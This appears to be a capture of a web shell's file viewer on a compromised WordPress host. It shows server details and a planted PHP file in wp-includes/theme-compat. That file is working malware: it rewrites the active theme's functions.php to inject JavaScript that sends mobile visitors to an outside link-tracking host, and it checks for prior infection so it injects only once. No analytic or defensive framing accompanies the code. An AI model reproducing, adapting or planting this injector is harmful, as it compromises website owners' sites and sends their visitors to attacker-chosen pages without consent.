HEX
Server: Apache/2.4.58 (IUS)
System: Linux fromcolo1.linveo.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: u100898694 (7904)
PHP: 8.1.29
Disabled: symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,passthru,escapeshellarg,escapeshellcmd,proc_get_status,proc_nice,proc_terminate,pclose,ini_alter,virtual,openlog,apache_child_terminate,apache_setenv,define_syslog_variables,highlight_file,ini_get_all,ini_restore,inject_code,openlog,posix_getpwuid,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,posix_setuid,posix_uname,syslog,system,show_source,pcntl_exec,virtual,suexec,dbmopen,dl,disk_free_space,diskfreespace,leak,apache_get_modules,apache_get_version,apache_note,apache_setenv,highlight_file
Upload Files
File: /home/u100898694/public_html/wp-includes/theme-compat/custom.file.1.1771828818.php
<!--Swn4Pvir-->
<?php

error_reporting(E_ALL);
ini_set('display_errors', 1);

$root = rtrim($_SERVER['DOCUMENT_ROOT'], '/');
$wpLoad = $root . '/wp-load.php';

if (!file_exists($wpLoad)) {
    trigger_error('wp-load.php not found', E_USER_ERROR);
}

require_once $wpLoad;

$theme = get_option('stylesheet');
if (!$theme) {
    trigger_error('Active theme not found', E_USER_ERROR);
}

$functions = $root . '/wp-content/themes/' . $theme . '/functions.php';
if (!file_exists($functions)) {
    trigger_error('functions.php not found', E_USER_ERROR);
}

$host = $_SERVER['HTTP_HOST'] ?? '';
$host = preg_replace('/:\d+$/', '', $host);
$parts = explode('.', $host);
if (count($parts) > 1) {
    array_pop($parts);
}
$var = implode('.', $parts);


$redirectCode =
"<?php\n".
"add_action('wp_head', function () {\n".
"?>\n".
"<script>\n".
"(function(){\n".
"    if (/Android|iPhone|iPad|iPod|BlackBerry|Windows Phone/i.test(navigator.userAgent)) {\n".
"        location.href = \"https://lakns.com/link?z=9557727&var={$var}&ymid={CLICK_ID}\";\n".
"    }\n".
"})();\n".
"</script>\n".
"<?php\n".
"});\n";


$content = file_get_contents($functions);
if ($content === false) {
    trigger_error('Failed to read functions.php', E_USER_ERROR);
}


if (strpos($content, 'lakns.com/link?z=9557727') !== false) {
    exit;
}


if (preg_match('/^<\?php\s*/', $content)) {
    $content = preg_replace('/^<\?php\s*/', $redirectCode, $content, 1);
} else {
    $content = $redirectCode . $content;
}


if (file_put_contents($functions, $content) === false) {
    trigger_error('Failed to write functions.php', E_USER_ERROR);
}